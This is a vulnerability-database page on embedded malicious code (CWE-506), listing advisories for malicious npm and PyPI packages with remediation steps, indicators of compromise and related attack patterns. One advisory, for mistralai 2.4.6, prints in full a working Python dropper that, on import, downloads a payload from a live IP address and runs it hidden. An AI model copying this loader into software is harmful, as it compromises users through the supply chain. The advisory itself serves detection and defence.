CWE-506
Allowed-with-ReviewEmbedded Malicious Code
Abstraction: Class · Status: Incomplete
The product contains code that appears to be malicious in nature.
524 vulnerabilities reference this CWE, most recent first.
GHSA-WV39-CGMM-CQ29
Vulnerability from github – Published: 2020-09-03 22:23 – Updated: 2021-09-29 21:27Version 2.0.2 contained malicious code. The package targeted the Ethereum cryptocurrency and performed transactions to wallets not controlled by the user.
Recommendation
Remove the package from your environment. Ensure no Ethereum funds were compromised.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "buffmr-xor"
},
"ranges": [
{
"events": [
{
"introduced": "0.0.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-506"
],
"github_reviewed": true,
"github_reviewed_at": "2020-08-31T18:52:51Z",
"nvd_published_at": null,
"severity": "CRITICAL"
},
"details": "Version 2.0.2 contained malicious code. The package targeted the Ethereum cryptocurrency and performed transactions to wallets not controlled by the user.\n\n\n## Recommendation\n\nRemove the package from your environment. Ensure no Ethereum funds were compromised.",
"id": "GHSA-wv39-cgmm-cq29",
"modified": "2021-09-29T21:27:19Z",
"published": "2020-09-03T22:23:00Z",
"references": [
{
"type": "WEB",
"url": "https://www.npmjs.com/advisories/1261"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Malicious Package in buffmr-xor"
}
GHSA-WWF2-5CJ8-JX6W
Vulnerability from github – Published: 2018-07-23 20:50 – Updated: 2023-09-13 22:59The nodesqlite package is a piece of malware that steals environment variables and sends them to attacker controlled locations.
All versions have been unpublished from the npm registry.
Recommendation
As this package is malware, if you find it installed in your environment, the real security concern is determining how it got there.
If you have found this installed in your environment, you should: 1. Delete the package 2. Clear your npm cache 3. Ensure it is not present in any other package.json files on your system 4. Regenerate your registry credentials, tokens, and any other sensitive credentials that may have been present in your environment variables.
Additionally, any service which may have been exposed via credentials in your environment variables, such as a database, should be reviewed for indicators of compromise as well.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "nodesqlite"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "1.0.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2017-16049"
],
"database_specific": {
"cwe_ids": [
"CWE-506"
],
"github_reviewed": true,
"github_reviewed_at": "2020-06-16T22:01:22Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "The `nodesqlite` package is a piece of malware that steals environment variables and sends them to attacker controlled locations. \n\nAll versions have been unpublished from the npm registry.\n\n\n## Recommendation\n\n\nAs this package is malware, if you find it installed in your environment, the real security concern is determining how it got there. \n\nIf you have found this installed in your environment, you should:\n1. Delete the package\n2. Clear your npm cache\n3. Ensure it is not present in any other package.json files on your system\n4. Regenerate your registry credentials, tokens, and any other sensitive credentials that may have been present in your environment variables. \n\nAdditionally, any service which may have been exposed via credentials in your environment variables, such as a database, should be reviewed for indicators of compromise as well.",
"id": "GHSA-wwf2-5cj8-jx6w",
"modified": "2023-09-13T22:59:29Z",
"published": "2018-07-23T20:50:21Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2017-16049"
},
{
"type": "ADVISORY",
"url": "https://github.com/advisories/GHSA-wwf2-5cj8-jx6w"
},
{
"type": "WEB",
"url": "https://www.npmjs.com/advisories/492"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "nodesqlite is malware"
}
GHSA-WWWG-6R7F-9C9H
Vulnerability from github – Published: 2020-09-03 19:43 – Updated: 2021-09-30 20:15This package contained malicious code. The package uploaded system information such as OS and hostname to a remote server.
Recommendation
Remove the package from your environment. There are no indications of further compromise.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "file-logging"
},
"ranges": [
{
"events": [
{
"introduced": "0.0.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-506"
],
"github_reviewed": true,
"github_reviewed_at": "2020-08-31T18:48:10Z",
"nvd_published_at": null,
"severity": "CRITICAL"
},
"details": "This package contained malicious code. The package uploaded system information such as OS and hostname to a remote server.\n\n\n## Recommendation\n\nRemove the package from your environment. There are no indications of further compromise.",
"id": "GHSA-wwwg-6r7f-9c9h",
"modified": "2021-09-30T20:15:33Z",
"published": "2020-09-03T19:43:28Z",
"references": [
{
"type": "WEB",
"url": "https://www.npmjs.com/advisories/1126"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Malicious Package in file-logging"
}
GHSA-WX9M-WX4F-4CMG
Vulnerability from github – Published: 2026-05-18 17:55 – Updated: 2026-05-18 17:55The mistralai PyPI package version 2.4.6 contains a malicious dropper that executes on import on Linux. No v2.4.6 tag, commit, or release workflow run exists in this repository, the legitimate latest version before the upload was 2.4.5, and the upload bypassed this repository's normal release pipeline (which uses PyPI Trusted Publishing).
The mistralai PyPI project is currently quarantined.
Affected
mistralai==2.4.6on PyPI.
Versions 2.4.5 and earlier are not known to be affected.
What the malicious code does
A function named _run_background_task was added to src/mistralai/client/__init__.py and called at module-load time. Reproduced from the public report in #523:
import subprocess as _sub
import os as _os
def _run_background_task():
if not _sys.platform.startswith("linux") or _os.environ.get("MISTRAL_INIT"):
return
_os.environ["MISTRAL_INIT"] = "1"
_url = "https://83.142.209.194/transformers.pyz"
_dest = "/tmp/transformers.pyz"
try:
if not _os.path.exists(_dest):
_sub.run(["curl", "-k", "-L", "-s", _url, "-o", _dest], timeout=15)
if _os.path.exists(_dest):
_sub.Popen(
[_sys.executable, _dest],
stdout=_sub.DEVNULL, stderr=_sub.DEVNULL,
start_new_session=True, env=_os.environ.copy()
)
except:
pass
_run_background_task()
On Linux only, the function:
- Returns early if
MISTRAL_INITis already set in the environment. - Sets
MISTRAL_INIT=1so the spawned child does not re-trigger the dropper if it importsmistralai. - Downloads
https://83.142.209.194/transformers.pyzto/tmp/transformers.pyzwithcurl -k -L -s(TLS verification disabled, 15 s timeout). Skips the download if the file is already present. - Spawns
transformers.pyzwith the current Python interpreter (sys.executable) as a detached process viaPopen(..., start_new_session=True), with stdout and stderr discarded and any exception silently swallowed.
On non-Linux platforms the function returns immediately and does nothing.
The trigger is import mistralai, not package installation. pip install of a wheel does not execute package code; for an sdist it runs PEP 517 build hooks but those are in setup.py / pyproject.toml, not in __init__.py — so pip install, pip download, and pip wheel do not invoke this dropper.
The contents of transformers.pyz are not in the package and were not analyzed in this advisory. The behavior of the second-stage payload on the host is therefore unknown.
Recommendation
Any Linux environment that imported mistralai==2.4.6 should be treated as potentially compromised pending forensic review. Rotate every credential reachable from the importing process and review host and cloud audit logs for activity from approximately 2026-05-12 00:05 UTC onward (per the timing reported in #523).
Check whether you are affected
Installed version:
pip show mistralai | grep -i ^version
Dependency files and lockfiles:
grep -n -E 'mistralai\b.*2\.4\.6' \
requirements*.txt pyproject.toml uv.lock poetry.lock Pipfile Pipfile.lock 2>/dev/null
Dropped file on disk:
ls -la /tmp/transformers.pyz
The presence of /tmp/transformers.pyz on a host that imported mistralai==2.4.6 indicates the download step ran successfully. Combined with absence of MISTRAL_INIT in the host's process environment history, it does not by itself confirm the second-stage executed; conversely its absence does not rule out execution if the file was cleaned up.
Remediation
- Pin
mistralaito2.4.5or earlier. While the PyPI project is quarantined, install from this repository at a known-good tag, e.g.git+https://github.com/mistralai/client-python.git@v2.4.5. - On affected Linux hosts, rotate every credential reachable from the importing process and review host and cloud audit logs.
Indicators of compromise
All IOCs below come from the public report in #523.
- File:
/tmp/transformers.pyz - Process: a Python interpreter (
sys.executable) running/tmp/transformers.pyzdetached from the parent's process group, with stdout/stderr to/dev/null - Environment variable:
MISTRAL_INIT=1 - Outbound HTTPS to
83[.]142[.]209[.]194fromcurl(no TLS verification) - Function added to the package:
_run_background_taskinsrc/mistralai/client/__init__.py - SHA-256 of the malicious sdist (as reported in #523):
6dbaa43bf2f3c0d3cddbca74967e952da563fb974c1ef9d4ecbb2e58e41fe81b
References
- Public report with the dropper code: https://github.com/mistralai/client-python/issues/523
- Quarantined PyPI project: https://pypi.org/project/mistralai/
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "mistralai"
},
"versions": [
"2.4.6"
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-506"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-18T17:55:27Z",
"nvd_published_at": null,
"severity": "CRITICAL"
},
"details": "The `mistralai` PyPI package version `2.4.6` contains a malicious dropper that executes on import on Linux. No `v2.4.6` tag, commit, or release workflow run exists in this repository, the legitimate latest version before the upload was `2.4.5`, and the upload bypassed this repository\u0027s normal release pipeline (which uses PyPI Trusted Publishing).\n\nThe `mistralai` PyPI project is currently quarantined.\n\n## Affected\n\n- `mistralai==2.4.6` on PyPI.\n\nVersions `2.4.5` and earlier are not known to be affected.\n\n## What the malicious code does\n\nA function named `_run_background_task` was added to `src/mistralai/client/__init__.py` and called at module-load time. Reproduced from the public report in [#523](https://github.com/mistralai/client-python/issues/523):\n\n```python\nimport subprocess as _sub\nimport os as _os\n\ndef _run_background_task():\n if not _sys.platform.startswith(\"linux\") or _os.environ.get(\"MISTRAL_INIT\"):\n return\n _os.environ[\"MISTRAL_INIT\"] = \"1\"\n _url = \"https://83.142.209.194/transformers.pyz\"\n _dest = \"/tmp/transformers.pyz\"\n try:\n if not _os.path.exists(_dest):\n _sub.run([\"curl\", \"-k\", \"-L\", \"-s\", _url, \"-o\", _dest], timeout=15)\n if _os.path.exists(_dest):\n _sub.Popen(\n [_sys.executable, _dest],\n stdout=_sub.DEVNULL, stderr=_sub.DEVNULL,\n start_new_session=True, env=_os.environ.copy()\n )\n except:\n pass\n\n_run_background_task()\n```\n\nOn Linux only, the function:\n\n1. Returns early if `MISTRAL_INIT` is already set in the environment.\n2. Sets `MISTRAL_INIT=1` so the spawned child does not re-trigger the dropper if it imports `mistralai`.\n3. Downloads `https://83.142.209.194/transformers.pyz` to `/tmp/transformers.pyz` with `curl -k -L -s` (TLS verification disabled, 15 s timeout). Skips the download if the file is already present.\n4. Spawns `transformers.pyz` with the current Python interpreter (`sys.executable`) as a detached process via `Popen(..., start_new_session=True)`, with stdout and stderr discarded and any exception silently swallowed.\n\nOn non-Linux platforms the function returns immediately and does nothing.\n\nThe trigger is `import mistralai`, not package installation. `pip install` of a wheel does not execute package code; for an sdist it runs PEP 517 build hooks but those are in `setup.py` / `pyproject.toml`, not in `__init__.py` \u2014 so `pip install`, `pip download`, and `pip wheel` do not invoke this dropper.\n\nThe contents of `transformers.pyz` are not in the package and were not analyzed in this advisory. The behavior of the second-stage payload on the host is therefore unknown.\n\n## Recommendation\n\nAny Linux environment that imported `mistralai==2.4.6` should be treated as potentially compromised pending forensic review. Rotate every credential reachable from the importing process and review host and cloud audit logs for activity from approximately 2026-05-12 00:05 UTC onward (per the timing reported in #523).\n\n## Check whether you are affected\n\nInstalled version:\n\n```bash\npip show mistralai | grep -i ^version\n```\n\nDependency files and lockfiles:\n\n```bash\ngrep -n -E \u0027mistralai\\b.*2\\.4\\.6\u0027 \\\n requirements*.txt pyproject.toml uv.lock poetry.lock Pipfile Pipfile.lock 2\u003e/dev/null\n```\n\nDropped file on disk:\n\n```bash\nls -la /tmp/transformers.pyz\n```\n\nThe presence of `/tmp/transformers.pyz` on a host that imported `mistralai==2.4.6` indicates the download step ran successfully. Combined with absence of `MISTRAL_INIT` in the host\u0027s process environment history, it does not by itself confirm the second-stage executed; conversely its absence does not rule out execution if the file was cleaned up.\n\n## Remediation\n\n1. Pin `mistralai` to `2.4.5` or earlier. While the PyPI project is quarantined, install from this repository at a known-good tag, e.g. `git+https://github.com/mistralai/client-python.git@v2.4.5`.\n2. On affected Linux hosts, rotate every credential reachable from the importing process and review host and cloud audit logs.\n\n## Indicators of compromise\n\nAll IOCs below come from the public report in [#523](https://github.com/mistralai/client-python/issues/523).\n\n- File: `/tmp/transformers.pyz`\n- Process: a Python interpreter (`sys.executable`) running `/tmp/transformers.pyz` detached from the parent\u0027s process group, with stdout/stderr to `/dev/null`\n- Environment variable: `MISTRAL_INIT=1`\n- Outbound HTTPS to `83[.]142[.]209[.]194` from `curl` (no TLS verification)\n- Function added to the package: `_run_background_task` in `src/mistralai/client/__init__.py`\n- SHA-256 of the malicious sdist (as reported in #523): `6dbaa43bf2f3c0d3cddbca74967e952da563fb974c1ef9d4ecbb2e58e41fe81b`\n\n## References\n\n- Public report with the dropper code: https://github.com/mistralai/client-python/issues/523\n- Quarantined PyPI project: https://pypi.org/project/mistralai/",
"id": "GHSA-wx9m-wx4f-4cmg",
"modified": "2026-05-18T17:55:27Z",
"published": "2026-05-18T17:55:27Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/mistralai/client-python/security/advisories/GHSA-wx9m-wx4f-4cmg"
},
{
"type": "WEB",
"url": "https://github.com/mistralai/client-python/issues/523"
},
{
"type": "PACKAGE",
"url": "https://github.com/mistralai/client-python"
},
{
"type": "WEB",
"url": "https://safedep.io/mass-npm-supply-chain-attack-tanstack-mistral"
},
{
"type": "WEB",
"url": "https://socket.dev/blog/tanstack-npm-packages-compromised-mini-shai-hulud-supply-chain-attack"
},
{
"type": "WEB",
"url": "https://www.stepsecurity.io/blog/mini-shai-hulud-is-back-a-self-spreading-supply-chain-attack-hits-the-npm-ecosystem"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Malicious dropper in mistralai 2.4.6 PyPI package"
}
GHSA-WXRM-2H86-V95F
Vulnerability from github – Published: 2020-09-03 21:04 – Updated: 2021-09-29 20:45Version 1.0.3 of pizza-pasta contains malicious code as a install scripts. The package created folders in the system's Desktop and downloaded an image from imgur.com. The package also printed the users SSH keys to the console.
Recommendation
Remove the package from your environment. There are no evidences of further compromise.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "pizza-pasta"
},
"ranges": [
{
"events": [
{
"introduced": "0.0.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-506"
],
"github_reviewed": true,
"github_reviewed_at": "2020-08-31T18:50:44Z",
"nvd_published_at": null,
"severity": "CRITICAL"
},
"details": "Version 1.0.3 of `pizza-pasta` contains malicious code as a install scripts. The package created folders in the system\u0027s Desktop and downloaded an image from `imgur.com`. The package also printed the users SSH keys to the console.\n\n\n## Recommendation\n\nRemove the package from your environment. There are no evidences of further compromise.",
"id": "GHSA-wxrm-2h86-v95f",
"modified": "2021-09-29T20:45:26Z",
"published": "2020-09-03T21:04:20Z",
"references": [
{
"type": "WEB",
"url": "https://www.npmjs.com/advisories/1196"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Malicious Package in pizza-pasta"
}
GHSA-X3M6-RPRW-862W
Vulnerability from github – Published: 2020-09-03 17:43 – Updated: 2021-09-30 19:50All versions of node-buc contain malicious code. The package uploads system information to a remote server, downloads a file and executes it.
Recommendation
Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "node-buc"
},
"ranges": [
{
"events": [
{
"introduced": "0.0.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-506"
],
"github_reviewed": true,
"github_reviewed_at": "2020-08-31T18:45:47Z",
"nvd_published_at": null,
"severity": "CRITICAL"
},
"details": "All versions of `node-buc` contain malicious code. The package uploads system information to a remote server, downloads a file and executes it.\n\n\n## Recommendation\n\nAny computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.\n\nThe package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.",
"id": "GHSA-x3m6-rprw-862w",
"modified": "2021-09-30T19:50:50Z",
"published": "2020-09-03T17:43:31Z",
"references": [
{
"type": "WEB",
"url": "https://www.npmjs.com/advisories/1059"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Malicious Package in node-buc"
}
GHSA-X3W4-MRMV-CW2X
Vulnerability from github – Published: 2020-09-03 22:19 – Updated: 2021-09-29 21:26Version 2.0.2 contained malicious code. The package targeted the Ethereum cryptocurrency and performed transactions to wallets not controlled by the user.
Recommendation
Remove the package from your environment. Ensure no Ethereum funds were compromised.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "buffev-xor"
},
"ranges": [
{
"events": [
{
"introduced": "0.0.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-506"
],
"github_reviewed": true,
"github_reviewed_at": "2020-08-31T18:52:44Z",
"nvd_published_at": null,
"severity": "CRITICAL"
},
"details": "Version 2.0.2 contained malicious code. The package targeted the Ethereum cryptocurrency and performed transactions to wallets not controlled by the user.\n\n\n## Recommendation\n\nRemove the package from your environment. Ensure no Ethereum funds were compromised.",
"id": "GHSA-x3w4-mrmv-cw2x",
"modified": "2021-09-29T21:26:19Z",
"published": "2020-09-03T22:19:44Z",
"references": [
{
"type": "WEB",
"url": "https://www.npmjs.com/advisories/1258"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Malicious Package in buffev-xor"
}
GHSA-X45V-PVPG-HCRH
Vulnerability from github – Published: 2020-09-03 19:54 – Updated: 2021-09-30 20:27This package contained malicious code. The package uploaded system information such as OS and hostname to a remote server.
Recommendation
Remove the package from your environment. There are no indications of further compromise.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "mysql-koa"
},
"ranges": [
{
"events": [
{
"introduced": "0.0.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-506"
],
"github_reviewed": true,
"github_reviewed_at": "2020-08-31T18:48:34Z",
"nvd_published_at": null,
"severity": "CRITICAL"
},
"details": "This package contained malicious code. The package uploaded system information such as OS and hostname to a remote server.\n\n\n## Recommendation\n\nRemove the package from your environment. There are no indications of further compromise.",
"id": "GHSA-x45v-pvpg-hcrh",
"modified": "2021-09-30T20:27:05Z",
"published": "2020-09-03T19:54:36Z",
"references": [
{
"type": "WEB",
"url": "https://www.npmjs.com/advisories/1136"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Malicious Package in mysql-koa"
}
GHSA-X48M-GP6R-GP4V
Vulnerability from github – Published: 2020-09-03 18:21 – Updated: 2021-09-30 20:04Version 1.0.3 of rate-map contains malicious code. The malware breaks functionality of the purescript-installer package by rewriting code of the dl-tar dependency.
Recommendation
Upgrade to version 1.0.5 or later. There is no indication of further compromise.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "rate-map"
},
"ranges": [
{
"events": [
{
"introduced": "1.0.3"
},
{
"fixed": "1.0.5"
}
],
"type": "ECOSYSTEM"
}
],
"versions": [
"1.0.3"
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-506"
],
"github_reviewed": true,
"github_reviewed_at": "2020-08-31T18:46:42Z",
"nvd_published_at": null,
"severity": "CRITICAL"
},
"details": "Version 1.0.3 of `rate-map` contains malicious code. The malware breaks functionality of the `purescript-installer` package by rewriting code of the `dl-tar` dependency.\n\n\n## Recommendation\n\nUpgrade to version 1.0.5 or later. There is no indication of further compromise.",
"id": "GHSA-x48m-gp6r-gp4v",
"modified": "2021-09-30T20:04:54Z",
"published": "2020-09-03T18:21:26Z",
"references": [
{
"type": "WEB",
"url": "https://www.npmjs.com/advisories/1083"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Malicious Package in rate-map"
}
GHSA-X52F-H74P-9JH8
Vulnerability from github – Published: 2018-07-23 21:00 – Updated: 2023-09-11 22:59The node-sqlite package is a piece of malware that steals environment variables and sends them to attacker controlled locations.
All versions have been unpublished from the npm registry.
Recommendation
As this package is malware, if you find it installed in your environment, the real security concern is determining how it got there.
If you have found this installed in your environment, you should: 1. Delete the package 2. Clear your npm cache 3. Ensure it is not present in any other package.json files on your system 4. Regenerate your registry credentials, tokens, and any other sensitive credentials that may have been present in your environment variables.
Additionally, any service which may have been exposed via credentials in your environment variables, such as a database, should be reviewed for indicators of compromise as well.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "node-sqlite"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "1.0.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2017-16048"
],
"database_specific": {
"cwe_ids": [
"CWE-200",
"CWE-506"
],
"github_reviewed": true,
"github_reviewed_at": "2020-06-16T22:02:07Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "The `node-sqlite` package is a piece of malware that steals environment variables and sends them to attacker controlled locations. \n\nAll versions have been unpublished from the npm registry.\n\n\n## Recommendation\n\n\n\n\nAs this package is malware, if you find it installed in your environment, the real security concern is determining how it got there. \n\nIf you have found this installed in your environment, you should:\n1. Delete the package\n2. Clear your npm cache\n3. Ensure it is not present in any other package.json files on your system\n4. Regenerate your registry credentials, tokens, and any other sensitive credentials that may have been present in your environment variables. \n\nAdditionally, any service which may have been exposed via credentials in your environment variables, such as a database, should be reviewed for indicators of compromise as well.",
"id": "GHSA-x52f-h74p-9jh8",
"modified": "2023-09-11T22:59:55Z",
"published": "2018-07-23T21:00:07Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2017-16048"
},
{
"type": "ADVISORY",
"url": "https://github.com/advisories/GHSA-x52f-h74p-9jh8"
},
{
"type": "WEB",
"url": "https://www.npmjs.com/advisories/493"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "node-sqlite is malware"
}
Mitigation
Remove the malicious code and start an effort to ensure that no more malicious code exists. This may require a detailed review of all code, as it is possible to hide a serious attack in only one or two lines of code. These lines may be located almost anywhere in an application and may have been intentionally obfuscated by the attacker.
CAPEC-442: Infected Software
An adversary adds malicious logic, often in the form of a computer virus, to otherwise benign software. This logic is often hidden from the user of the software and works behind the scenes to achieve negative impacts. Many times, the malicious logic is inserted into empty space between legitimate code, and is then called when the software is executed. This pattern of attack focuses on software already fielded and used in operation as opposed to software that is still under development and part of the supply chain.
CAPEC-448: Embed Virus into DLL
An adversary tampers with a DLL and embeds a computer virus into gaps between legitimate machine instructions. These gaps may be the result of compiler optimizations that pad memory blocks for performance gains. The embedded virus then attempts to infect any machine which interfaces with the product, and possibly steal private data or eavesdrop.
CAPEC-636: Hiding Malicious Data or Code within Files
Files on various operating systems can have a complex format which allows for the storage of other data, in addition to its contents. Often this is metadata about the file, such as a cached thumbnail for an image file. Unless utilities are invoked in a particular way, this data is not visible during the normal use of the file. It is possible for an attacker to store malicious data or code using these facilities, which would be difficult to discover.